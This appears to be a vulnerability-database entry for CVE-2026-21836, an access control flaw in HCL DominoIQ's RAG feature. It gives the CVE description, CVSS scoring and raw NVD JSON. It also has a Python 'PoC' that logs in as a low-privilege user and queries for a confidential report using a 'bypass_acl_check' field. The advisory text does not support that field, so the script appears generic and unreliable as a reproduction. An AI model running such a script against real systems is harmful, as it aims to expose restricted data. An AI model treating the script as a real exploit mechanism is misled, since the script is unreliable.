Security Vulnerability Report
CVE-2026-21836 CVSS 6.5 MEDIUM

CVE-2026-21836

Published: 2026-05-20 14:16:36
Last Modified: 2026-05-20 14:23:45

Description

The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability. Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query. This could enable an authenticated attacker to view sensitive data.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HCL DominoIQ RAG feature (for the specific affected versions, see the official HCL security advisory KB0130932)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (Example)
TARGET_URL = "https://target-dominoiq.example.com/api/rag/query"

# Attacker credentials (Low privilege)
AUTH_CREDS = {
    "username": "low_priv_user",
    "password": "password123"
}


def exploit_cve_2026_21836():
    session = requests.Session()

    # Step 1: Authenticate
    print("[+] Authenticating...")
    login_resp = session.post("https://target-dominoiq.example.com/api/login", json=AUTH_CREDS)
    if login_resp.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Login successful")

    # Step 2: Send AI Query designed to retrieve sensitive documents
    # The attacker asks for data that should be restricted
    payload = {
        "query": "Summarize the contents of the confidential financial report for Q1",
        "context": "bypass_acl_check"
    }

    print("[+] Sending malicious AI query...")
    response = session.post(TARGET_URL, json=payload)

    if response.status_code == 200:
        data = response.json()
        # Check if sensitive data is leaked in the AI response
        answer = data.get('answer', '')
        if 'confidential' in answer.lower() or 'financial' in answer.lower():
            print("[!] Potential data leakage detected:")
            print(answer)
        else:
            print("[+] Query processed, check manually for sensitive data.")
    else:
        print("[-] Query failed")


if __name__ == "__main__":
    exploit_cve_2026_21836()
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932 (HCL security advisory KB0130932)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-21836",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-20T14:16:36.373",
    "lastModified": "2026-05-20T14:23:44.700",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability.  Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query.  This could enable an authenticated attacker to view sensitive data."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932",
        "source": "[email protected]"
      }
    ]
  }
}
```